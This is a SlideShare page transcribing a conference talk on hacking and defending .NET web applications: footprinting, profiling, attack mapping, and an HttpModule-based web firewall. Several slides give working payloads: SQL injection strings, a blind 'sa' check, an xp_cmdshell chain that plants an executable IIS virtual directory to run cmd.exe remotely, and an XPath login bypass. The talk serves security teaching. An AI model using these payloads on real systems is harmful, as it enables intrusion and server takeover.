• Save

Loading…

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

Like this presentation? Why not share!

Hacking and Securing .NET Apps (Infosecworld)

on

  • 113,366 views

 

Statistics

Views

Total Views
113,366
Views on SlideShare
113,185
Embed Views
181

Actions

Likes
6
Downloads
0
Comments
0

33 Embeds 181

http://knitinr.blogspot.com 83
http://www.blueinfy.com 12
http://knitinr.blogspot.de 9
http://knitinr.blogspot.ca 8
http://www.slideshare.net 8
http://shreeraj.blogspot.in 6
http://websecurity.com.ua 5
http://knitinr.blogspot.com.br 5
http://knitinr.blogspot.in 4
http://static.slideshare.net 3
http://knitinr.blogspot.com.au 3
http://www.techgig.com 3
http://knitinr.blogspot.it 3
http://www.secguru.com 3
http://pcsilva.blogspot.com 3
http://knitinr.blogspot.ae 2
http://knitinr.blogspot.sg 2
http://knitinr.blogspot.co.uk 2
http://knitinr.blogspot.com.es 2
http://blueinfy.com 2
http://115.112.206.134 1
http://shreeraj.blogspot.com 1
http://localhost 1
http://knitinr.blogspot.jp 1
http://knitinr.blogspot.cz 1
http://knitinr.blogspot.se 1
http://knitinr.blogspot.co.nz 1
http://static.slidesharecdn.com 1
http://knitinr.blogspot.co.at 1
http://knitinr.blogspot.fr 1
http://translate.googleusercontent.com 1
http://knitinr.blogspot.fi 1
https://www.linkedin.com 1
More...

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Hacking and Securing .NET Apps (Infosecworld) Hacking and Securing .NET Apps (Infosecworld) Presentation Transcript

  • Session H4 Hacking and Securing .NET
  • Introduction Founder & Director G Net Square (Brief) – Past experience G Chase, IBM & Foundstone – Interest G Web security research – Published G Advisories, Tools, Papers etc. – Book G Web Hacking – http://shreeraj.blogspot.com shreeraj@net-square.com Shreeraj Shah
  • Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
  • Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
  • Industry WEB 2.0 & Rich internet Applications G are on the rise Web Services framework is picking G up. Web services would rocket from $1.6 G billion in 2004 to $34 billion by 2007. [IDC] Application layer is becoming critical G for business success. Messaging mechanisms are G changing. Shreeraj Shah
  • Industry Sample new applications G www.live.com – www.netvibes.com – www.writely.com – www.start.com – Etc… – Shreeraj Shah
  • Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
  • Infrastructure Evolution - 1 Internet router intranet www mail Database 9 Shreeraj Shah
  • Infrastructure Evolution - 2 Other Offices Internet Exchange DMZ Dial-up router intranet VPN www mail Database RAS Shreeraj Shah
  • Infrastructure Evolution - 3 Other Offices Internet Exchange firewall DMZ Dial-up router intranet VPN www mail Database RAS Shreeraj Shah
  • Defense posture and Evolution Web Services Business Application Level Application Level Web/customized etc.. Services Level Traditional Attacks Brute force IIS web/SMTP/POP etc.. RPC buffer overflow Null session Etc.. Operating System Level ipc$/wu-ftpd/sunrpc etc.. 12 Shreeraj Shah
  • Defense posture and Evolution Firewall VPN IDS Auth Server Etc… Web Services Business Application Level Application Level Web/customized etc.. Services Level X IIS web/SMTP/POP etc.. Traditional Attacks X Brute force RPC buffer overflow Operating System Level Null session X Etc.. ipc$/wu-ftpd/sunrpc etc.. 13 Shreeraj Shah
  • Defense posture and Evolution Firewall VPN IDS Auth Server Web Services Etc… Business Application Level Application Level Next Generation Web/customized etc.. Attacks SQL injection Parameter tempering Services Level Etc.. X IIS web/SMTP/POP etc.. Brute force X RPC buffer overflow Null session Operating System Level X Etc.. ipc$/wu-ftpd/sunrpc etc.. Added Defense Accounts/Shares/Patches/updates/Logging/Auditing/ 14 Ports/Registries etc… Shreeraj Shah
  • Defense posture and Evolution Application Layer Content Filtering Firewall Web Services Business Application Level Application Level Web/customized etc.. Next Generation Attacks SQL injection Parameter tempering Services Level X Etc.. IIS web/SMTP/POP etc.. Brute force RPC buffer overflow X Operating System Level Null session X Etc.. ipc$/wu-ftpd/sunrpc etc.. Firewall Added Defense Accounts/Shares/Patches/updates/Logging/Auditing/ 15 Ports/Registries etc… Shreeraj Shah
  • Defense posture and Evolution Application Layer Firewall Web Services Business Application Level Web Services Attacks Application Level Web/customized etc.. Next Generation Attacks SQL injection Parameter tempering Services Level X Etc.. IIS web/SMTP/POP etc.. Brute force RPC buffer overflow X Operating System Level Null session X Etc.. ipc$/wu-ftpd/sunrpc etc.. Firewall Added Defense Accounts/Shares/Patches/updates/Logging/Auditing/ 16 Ports/Registries etc… Shreeraj Shah
  • Defense posture Runtime Platform Services and Services and Components Components Partner Application Customer Layer Logic User 1. Presentation Supplier 2. Business 3. Data Access Hacker Prospect Host Security Employee Operating System Network Security Routers Firewalls Switches 17 Shreeraj Shah
  • Evolution of Web applications Internet DMZ Scripted Web Web Web Server Engine Client Static pages only Dynamic pages ASP HTML,HTM etc.. DHTML,PHP,CGI Etc.. DB 18 Internal/Corporate Shreeraj Shah
  • Evolution of Web applications Internet DMZ Trusted Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages only Dynamic pages ASP Coldfusion HTML,HTM etc.. DHTML,PHP,CGI Etc.. Etc.. X DB 19 Internal/Corporate Shreeraj Shah
  • Evolution of Web applications Internet DMZ Trusted Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 20 Internal/Corporate Shreeraj Shah
  • Evolution of Web applications Internet DMZ Trusted Application Scripted Web Servers Web Web Server And Engine Client Static pages Dynamic pages Integrated HTML,HTM etc.. ASP DHTML, Framework PHP,CGI Etc.. ASP.NET with X .Net J2EE App Server Web Services Etc.. DB 21 Internal/Corporate Shreeraj Shah
  • Evolution of Web applications Internet DMZ Trusted SOAP Web Service W Client E Application Scripted B Web Servers Web S Server And Engine E Static pages Dynamic pages Web Integrated R HTML,HTM etc.. ASP DHTML, V Client Framework PHP,CGI Etc.. I ASP.NET with C X .Net E J2EE App S Server Web Services Etc.. DB 22 Internal/Corporate Shreeraj Shah
  • Technologies Web Services is forming back end and G accessible on SOAP AJAX – empowering browsers G XML based services G Rich Internet Applications are consuming G back end web services Search engines and mechanisms for web G services publishing and accessing Security evolving around web services G Shreeraj Shah
  • Technologies Simple GET/POST Simple AJAX HTTP resource Web Calls Web Services Server resource Web Services Client Start.com DEMO Shreeraj Shah
  • Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
  • Security! 95% companies were hacked from web G applications and 5% of them were aware of them – FBI/CSI Most popular attacks are against web G server – incident.org 3 out of 4 web sites are vulnerable to G attack (Gartner) 75% hacks occurs at application level G (Gartner) Every 1500 lines of code has one security G vulnerability (IBM Labs) 2000 attacks / week for unprotected web G site Shreeraj Shah
  • Security! Over 80% 100 of all malicious attacks 80 “target port 80.” 60 - Network world 40 20 Services web server SQL Cross-site Buffer Cookie others Parameter vulnerabilities vulnerabilities injection scripting overflows poisoning Tampering Shreeraj Shah
  • Security! CSI Security Survey : Vulnerability Distribution misconfiguration, other problems 36% programming errors 64% misconfiguration, other problems programming errors Shreeraj Shah
  • Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
  • Defining Methods Black Box Method: Analyzing application with an G attacker’s perspective. Seeing the web resources available to common user – like just to see 80 and 443. White Box Method: Analyzing application with full G knowledge and access. Access to deployment setup, Source code and other resources which are on the box. Shreeraj Shah
  • Traditional - Application Internet Internal Application Phase 1 Systems Systems Vulnerability Vulnerability Vulnerability Assessment Assessment Assessment Security Architecture review Code / app Phase 2 review Internet Internal App / DB Systems Systems audit Audit Audit Phase 3 Internet Internal App / DB Systems Systems re-code / lock-down lock-down lock-down Continuous Security Monitoring and Assessment Phase 4 Shreeraj Shah
  • Analysis Cycle Deployment Analysis (White Box Approach) Application Analysis (Black Box Approach) Attacks Identification Web (Black Box Approach) Application Asset – Attacks Mapping Defense Strategies (White Box Approach) 44 Shreeraj Shah
  • Methodology Footprinting Discovery Profiling Manual Attacks Auto Attacks Exploit 45 Defense Shreeraj Shah
  • Footprinting & Discovery Footpritning & Discovery G “Host” is essential – IP/Port combination is not enough – Old approaches G whois & PTR – May not work – New approaches G Search engines – Advanced whois database – Shreeraj Shah
  • Information Exposure Multi-hosted scenario G <VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com DocumentRoot /usr/local/apache2/htdocs # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> <VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com DocumentRoot /usr/local/apache2/htdocs/blue ServerName www.blue.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> <VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com DocumentRoot /usr/local/apache2/htdocs/red ServerName www.red.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> Shreeraj Shah
  • Information Exposure C:Documents and SettingsAdministrator> nc 203.88.128.10 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Tue, 11 Jan 2005 20:17:40 GMT Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4 Content-Location: index.html.en Vary: negotiate,accept-language,accept-charset TCN: choice Last-Modified: Fri, 04 May 2001 00:01:18 GMT ETag: "1c4d0-5b0-40446f80;1c4e6-961-8562af00" Accept-Ranges: bytes Content-Length: 1456 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en Expires: Tue, 11 Jan 2005 20:17:40 GMT Shreeraj Shah
  • Information Exposure C:Documents and SettingsAdministrator> nc 203.88.128.10 80 HEAD / HTTP/1.0 Host: www.blue.com HTTP/1.1 200 OK Date: Tue, 11 Jan 2005 20:17:45 GMT Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4 Last-Modified: Tue, 04 Jan 2005 23:10:29 GMT ETag: "1865-b-f991a340" Accept-Ranges: bytes Content-Length: 11 Connection: close Content-Type: text/html; charset=ISO-8859-1 Shreeraj Shah
  • Information Exposure C:Documents and SettingsAdministrator> nc 203.88.128.10 80 HEAD / HTTP/1.0 Host: www.red.com HTTP/1.1 200 OK Date: Tue, 11 Jan 2005 20:17:57 GMT Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4 Last-Modified: Tue, 04 Jan 2005 23:16:57 GMT ETag: "1cc0b-9-10b20c40" Accept-Ranges: bytes Content-Length: 9 Connection: close Content-Type: text/html; charset=ISO-8859-1 Shreeraj Shah
  • Information Exposure C:Program FilesGnuWin32in>jwhois -h whois.arin.net 203.88.128.10 [Querying whois.arin.net] [whois.arin.net] OrgName: XYZ corp OrgID: XYZC Address: 101 First Avenue City: NYC StateProv: NY PostalCode: 94089 Country: US NetRange: 203.88.128.0 – 203.88.128.255 CIDR: 203.88.128.0/20 NetName: XYZC-4 NetHandle: NET-203-88-128-0-1 Parent: NET-203-0-0-0-0 NetType: Direct Allocation NameServer: ns1.xyz.com NameServer: ns2.xyz.com Comment: RegDate: 2003-07-17 Updated: 2003-07-17 OrgTechHandle: NA098-ARIN OrgTechName: Netblock Admin OrgTechPhone: +1-212-999-9999 OrgTechEmail: netblockadmin@xyz.com # ARIN WHOIS database, last updated 2005-01-10 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database. Shreeraj Shah C:Program FilesGnuWin32in>
  • Information Exposure C:Documents and SettingsAdministrator>nslookup Default Server: ns1.icenet.net Address: 203.88.128.7 > server ns1.xyz.com Default Server: [203.88.128.250] Address: 203.88.128.250 > 203.88.128.10 Server: [203.88.128.250] Address: 203.88.128.250 Name: www.blue.com Bingo! Address: 192.168.7.50 > set type=PTR > 203.88.128.10 Server: [203.88.128.250] Address: 203.88.128.250 10.128.88.203.in-addr.arpa name = www.blue.com 10.128.88.203.in-addr.arpa name = www.red.com > Shreeraj Shah
  • Information Exposure C:Documents and SettingsAdministrator>nslookup Default Server: ns1.icenet.net Address: 203.88.128.7 > server 203.88.128.250 Default Server: icedns1.icenet.net Address: 203.88.128.250 > 203.88.128.11 Server: icedns1.icenet.net Address: 203.88.128.250 Name: ice.128.client11.icenet.net Sucks! Address: 203.88.128.11 > set type=PTR > 203.88.128.11 Server: icedns1.icenet.net Address: 203.88.128.250 Non-authoritative answer: 11.128.88.203.in-addr.arpa name = ice.128.client11.icenet.net > 203.88.128.11 Server: icedns1.icenet.net Address: 203.88.128.250 Non-authoritative answer: 11.128.88.203.in-addr.arpa name = ice.128.client11.icenet.net Shreeraj Shah
  • Information Exposure http://whois.webhosting.info/IP Bingo! www.whois.sc Shreeraj Shah
  • Search Engine Kung-Fu Domain & Cross Domain footprinting G MSN & Google can help G “Site:” – Domain harvesting – “link:” (Google) & “linkdomain:” (MSN) – – Cross Domain harvesting “inurl:” – Filtering – “IP:” (MSN) – Host footprinting – Advanced methods of footprinting G MSNPawn tool G http://net-square.com/msnpawn – DEMO Shreeraj Shah
  • Profile Profiling web application is very G important task to identify possible attacks. AJAX and web services calls G Objective is to find from where we G get cookie?, where are the forms?, It has applet or objects?, Querystrings are around or not? And such. Regex can be used on HTML code to G fetch these info. Shreeraj Shah
  • Sample Profile URL (Asset) Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr X X / /cart.aspx X /include/styles.css X /privacy.aspx X /catalog.aspx /aboutus.aspx X X /details.aspx?id=1 X X /details.aspx?id=2 X X /details.aspx?id=3 /rebates.aspx X X /catalog.aspx?start=3 X X /rebates.aspx?loc=beckham.html X X /rebates.aspx?loc=zhivago.html X X X X /orderapp/default.aspx?login=yes X /orderapp/include/styles.css X X /rebates.aspx?loc=monsoon.html X /details.aspx?id=4 X X X /rebates.aspx?loc=lawrence.html /details.aspx?id=5 X X X /details.aspx?id=6 X DEMO X /catalog.aspx?start=6 X Shreeraj Shah
  • Web Application Assets Each identified attribute can have G vulnerability. Vulnerability can be exploited by G hacker. Forms and Query string are major G source of exploitation. Other parameters like cookie, scripts G (client side java, vb etc.) and path info (include, cgi-bin, servlet etc.) expose business level information. Shreeraj Shah
  • Once again public domain usage We can fetch this info from public domain G like Google – “site:” G We can fetch technology clues using “inurl” or “filetype” G One can fetch “cache” information from google and can profile them as well. G Can be fetched from www.archive.org http://web.archive.org/web/*www.google.com * DEMO Shreeraj Shah
  • Search Engine Kung-Fu Profiling & fetching list of URLs G “site:” – Advantage : Passive & One shot – harvesting Technology identification from G search engine. Vulnerability and resource leakage G analysis from engine MSNPawn for MSN hacking – Google hacking tools – DEMO Shreeraj Shah
  • Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
  • Deployment Attack Points Configuration Backup files Reverse Permission Config files Proxy Ext. Mapping Dir Browsing Common files (Web Integration files Hidden web paths Server) WEB-INF etc. Cross side trace Scripted Application Web Web Web Servers Server Engine Client .NET Static pages Dynamic pages WebLogic HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. Roles DB Extended SPs DEMO 50 Internal/Corporate Shreeraj Shah
  • Deployment Analysis for .Net Scanning *.config files G Mapping understanding G Directory browsing and other G permission checks Metadata can help in automated G scanning on .Net DEMO Code Walk Shreeraj Shah
  • Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net Application (Controls) Attacks .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
  • Exposure to asset Security Vulnerability Controls and Policies Exploit Attack Tools X Agents Asset Technique Goals X & Methods Motives Exploit Poor Control 93 Shreeraj Shah
  • Impact Trail – Form / Query String Internet DMZ Trusted Client side processing Parameter Variable Processing Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Query Beans Processing Etc.. DB 94 Internal/Corporate Shreeraj Shah
  • Impact Trail – Form / Query String c: ools>nc <HOST> 80 Internet DMZ Trusted GET /account.aspx?id=5 HTTP/1.0 … … Client side processing Parameter Variable Processing Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Query Beans Processing Etc.. DB 95 Internal/Corporate Shreeraj Shah
  • Impact Trail – Form / Query String c: ools>nc <HOST> 80 Internet DMZ Trusted POST /account.aspx HTTP/1.0 … … Client side Id=5&customer=6 processing Parameter Variable Processing Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Query Beans Processing Etc.. DB 96 Internal/Corporate Shreeraj Shah
  • Impact Trail – Comments / Email Internet DMZ Trusted Information Usage Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 97 Internal/Corporate Shreeraj Shah
  • Impact Trail – Comments / Email ….. <a HREF=“mailto:admin@example.com>... Internet DMZ Trusted …. < - - code in db,inc changed 12/12/2002 by John -!> …. Information Usage Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 98 Internal/Corporate Shreeraj Shah
  • Impact Trail – Applet / Object Internet DMZ Trusted Client Side Processing Data Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 99 Internal/Corporate Shreeraj Shah
  • Impact Trail – Applet / Object ….. <applet codebase=./code/> … </applet> Internet DMZ Trusted …. <object classid= 5672….></object> Client Side Processing Data Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 100 Internal/Corporate Shreeraj Shah
  • Impact Trail – Cookie HTTP/1.x 200 OK …. Internet Set-Cookie: DMZ Trusted ASPSESSIONIDCSSBBRQR=MKELONCBPANNHEKHCFGABJGB; CID=1 Session Client Side Session Decision Session usage Management Session Cookie Application Cookie Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Transport Layer State 101 Internal/Corporate Shreeraj Shah
  • Impact Trail – Authentication Internet DMZ Trusted Client side Control ACL ACL based Processing Decisions Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Data Access Beans based on ACL Etc.. DB 102 Internal/Corporate Shreeraj Shah
  • Impact Trail – Authentication Form based (user/pass) Internet DMZ Trusted NTLM/BASIC/DIGEST etc… Client side Control ACL ACL based Processing Decisions Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Data Access Beans based on ACL Etc.. DB 103 Internal/Corporate Shreeraj Shah
  • Asset – Impact Observations Logic Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr Presentation X X X X X X X X X X X X Business X X X X X X Data Access 105 Shreeraj Shah
  • Asset to Attack Mapping URL (Asset) Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr X X Input Validation X Authorization X X X X X Parameter Tempering X Authentication X X Brute Forcing X X X Session Management X X X SQL Manipulation X X File Operations X X X Information Leakage Error/Exception management X X X X X X Client Side Manipulation X X X Java Decompile Cryptography X X Buffer Overflows X X X X Remote Command Execution 106 Shreeraj Shah
  • Source Code Disclosure Ability to retrieve application files in G an unparsed manner. Attackers can recover the source G code of the web application itself. The code can then be used to find G further loopholes / trophies. May be caused by many ways: G Misconfiguration or vendor errors – Poor application design, etc. – 108 Shreeraj Shah
  • Input Validation Root cause of most web hacks. G All inputs received should be G validated: data types – data ranges (e.g. -ve or fractional – numbers) buffer sizes and bounds – metacharacters – Tampering with hidden fields. G Bypassing client side checking (e.g. G javascript). 111 Shreeraj Shah
  • Data types and HTTP In HTTP, everything is a string. G Assign data types for each G parameter Basic data types: G integer, string, date, floating point, – etc. Complex data types: G file path, session identifier, – credentials, etc. 112 Shreeraj Shah
  • SQL Query Poisoning Parameters from the URL or input G fields get used in SQL queries. An instance of Input Validation G attacks. Data can be altered to extend the G SQL query. http://server/query.asp?item=3+OR +1=1 Execution of stored procedures. G May even lead to back-end database G server compromise. 117 Shreeraj Shah
  • Force SQL errors Insert meta-characters around or G within the parameters. Range testing - BOF or EOF. G Changing the data type. G Premature query termination: G quotation marks - ‘ or “ – trailing hyphens -- – Look for error messages generated G from the database. 119 Shreeraj Shah
  • Identifying SQL errors Try and force error messages from G database servers. Gives us an idea how the SQL query G is being created and used. Tamper the input parameter. G Change data type – Premature termination by ‘ “ etc… – If the SQL query fails, we have a G candidate for SQL injection. 122 Shreeraj Shah
  • Identifying SQL errors Identify which resources contain SQL G interfaces. Identify the offending parameters G which cause the SQL queries to break. Root cause of all SQL query G poisoning is lack of input sanitization. Strip off meta-characters. G 123 Shreeraj Shah
  • Extend SQL queries Add valid SQL clauses to extend the G SQL query. “OR 1=1” G return all rows. – “;SELECT …” G multiple queries. – “;EXEC …” G stored procedures. – 126 Shreeraj Shah
  • Executing Stored Procedures SQL Injection attacks can be G extended beyond excessive data retrieval. Stored procedures, if known, and G accessible, can also be invoked. For example Microsoft SQL – Server’s extended stored procedures. Use the SQL “EXEC” statement. G 129 Shreeraj Shah
  • SQL Injection What if it is blind? G You don’t know web root – Firewall don’t allow outbound – traffic If you know web root – it is not – providing write rights. xp_cmdshell? - may or may not be – working. Is it running with “sa”? – Shreeraj Shah
  • Making “sa” check… Querying process on SQL using SPs G (SELECT+ASCII(SUBSTRING((a.login G ame),1,1))+FROM+master..sysproce sses+AS+a+WHERE+a.spid+=+@@ SPID)=115 Final query would be “and” G ?id=1+AND+(SELECT+ASCII(SUBST G RING((a.loginame),1,1))+FROM+ma ster..sysprocesses+AS+a+WHERE+a .spid+=+@@SPID)=114 DEMO Shreeraj Shah
  • Pulling “winnt” out… Echoing following lines blindly using G XP_CMDShell… Set WshShell = WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo Shreeraj Shah
  • Echoing… http://target/details.aspx?id=1;exec+mast G er..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ ….. And so on…. (All lines) Now run the vbscript G http://target/details.aspx?id=1;exec+mast er..xp_cmdshell+'cscript+c:secret.vbs’ G Check http://target/secret/system32/cmd.exe?+/c +set Bingo! DEMO Shreeraj Shah
  • With metasploit… Shreeraj Shah
  • XPATH Injection XPATH is a language defined to find G information from XML document. As XPATH name suggests it indeed uses G path to traverse through nodes of XML document and look for specific information from the document. XPATH provides expressions like slash (/), G double slash (//), dot(.), double dot (..), @, =, <, > etc. It helps in traversing through XML document. Shreeraj Shah
  • XPATH – Vulnerable Code string fulltext = ""; string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = "//users[@username='"+user+"' and @password='"+pass+"']"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false Shreeraj Shah
  • Attacking XPATH point //users[@username='"+user+"' and @password='"+pass+"']"; G XPATH parsing can be leveraged by passing G following string ' or 1=1 or ''=‘ This will always true on the first node and G user can get access as who ever is first user. //users[@username='' or 1=1 or ''='' and @password='any'] G Bingo! DEMO Shreeraj Shah
  • Session Identifiers The hash key - “session identifier” G A Unique value for every session. G Passed back and forth between the G browser and the server. Implemented by a session cookie: G PHP PHPSESSID – ASP ASPSESSIONID – JSP jsessionid, etc. – 141 Shreeraj Shah
  • Session Identifiers Non-Sequenceable: G Should not be serially – incremented. Cryptographically generated: G e.g. MD5(current time stamp + – random salt) Impossible to reverse-engineer. – It may be possible to change the G session cookie value… No way of guessing other session cookie values 142 Shreeraj Shah
  • AJAX hacking AJAX – silent killer G Can fetch information from SSL site G Dynamic execution of the script G XML object – fetching information G DEMO Code Walk 142 Shreeraj Shah
  • Source Code Review Analyzing source code G .NET – code analysis G Web application code review G What to look for? G How to grab right information? G Let’s see demo and tools G DEMO Code Walk Shreeraj Shah
  • Binary audit .NET application binary analysis G Important step G Look for key security information G How to analyze binary? G What to look for? G Tools & Demo G DEMO Code Walk Shreeraj Shah
  • Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
  • What is new in .Net? Web application has separate scope G and HTTP pipeline can be accessed. ISAPI had some limitations which are G not with HTTP interfaces. HTTP request can be accessed G before it hits application resources. HTTPModule and HTTPHandler are G defense at your gates. Can we build Web application G firewall and IDS – “YES” Shreeraj Shah
  • Web Application without defense Internet DMZ Trusted Corporate Firewall IIS Web Application Web Client Resource.. Server DB Internal/Corporate Shah Shreeraj
  • Web Application – Defense at gates Internet DMZ Trusted Web Corporate 1 Application Firewall Firewall IIS Web Application Web Client Resource.. Server 2 Web Application DB IDS Internal/Corporate Shah Shreeraj
  • HTTP Stack for .Net Web Application Client Request Response IIS aspnet_isapi.dll HttpModule HttpModule HttpApplication HttpModule HttpHandler Web Application Resource Shreeraj Shah
  • HTTP Stack for .Net HttpRuntime HttpApplicationFactory IHttpModule HttpApplication HttpContext HttpRequest HttpResponse HttpHandlerFactory IHttpHandler Handler Shreeraj Shah
  • Leveraging HTTPModule and HTTPHandler - can G be leveraged. Application layer firewall can be G cooked up for your application. Similarly IDS for web application can G be developed. It sits in HTTP pipe and defend web G applications. Shreeraj Shah
  • HTTP Stack for .Net HttpRuntime HttpApplicationFactory Web Application Firewall & IDS HttpApplication IHttpModule HttpHandlerFactory Handler Shreeraj Shah
  • IHttpModule – Events Capturing events when HTTP request G arrives. Shreeraj Shah
  • IHttpModule – Events Capturing events when HTTP response is G about to go. Shreeraj Shah
  • IHttpModule – Events Pre send events G Shreeraj Shah
  • Initializing using System; Extending Interface using System.Web; using System.Text.RegularExpressions; namespace webfirewall { public class webfirewall : IHttpModule { NOTE: The sample code shown here is written in C#. You must create a project as “Class Library” since you will be creating a .dll file that fits into the IIS HTTP processing chain or pipe. “System.Web” must be included as reference assembly to the project. The IHTTPModule interface resides in “System.Web”. Shreeraj Shah
  • Regex Filtering capability Adding regex filtering for incoming requests and parameters public string[] setPattern(string doc,string pat,int num) { Regex exp = new Regex(@pat,RegexOptions.IgnoreCase); MatchCollection mc = exp.Matches(doc); string[] results = new string[mc.Count]; for (int i=0;i<mc.Count;i++) { Match FirstMatch = mc[i]; results[i] = FirstMatch.Groups[num].ToString(); } return results; } Shreeraj Shah
  • Accessing HTTP stack • Creating Application stack instance • Capturing event for processing public void Init(HttpApplication httpApp) { httpApp.BeginRequest += new EventHandler(this.OnBeginRequest); Shreeraj Shah
  • Accessing HTTP stack • Firewall and IDS rules for GET and POST requests string[] query,post; public void Init(HttpApplication App) { App.BeginRequest += new EventHandler(this. ProcessRequest); string inifile = Environment.CurrentDirectory + "irewallrulesonfig.ini"; System.IO.StreamReader reader = new System.IO.StreamReader(inifile); string data = reader.ReadToEnd (); reader.Close(); string[] qres = setPattern(data,"<QUERY>(.*?)</QUERY>",1); query = new string[qres.Length]; query = qres; string[] pres = setPattern(data,"<POST>(.*?)</POST>",1); post = new string[pres.Length]; post = pres; } Shreeraj Shah
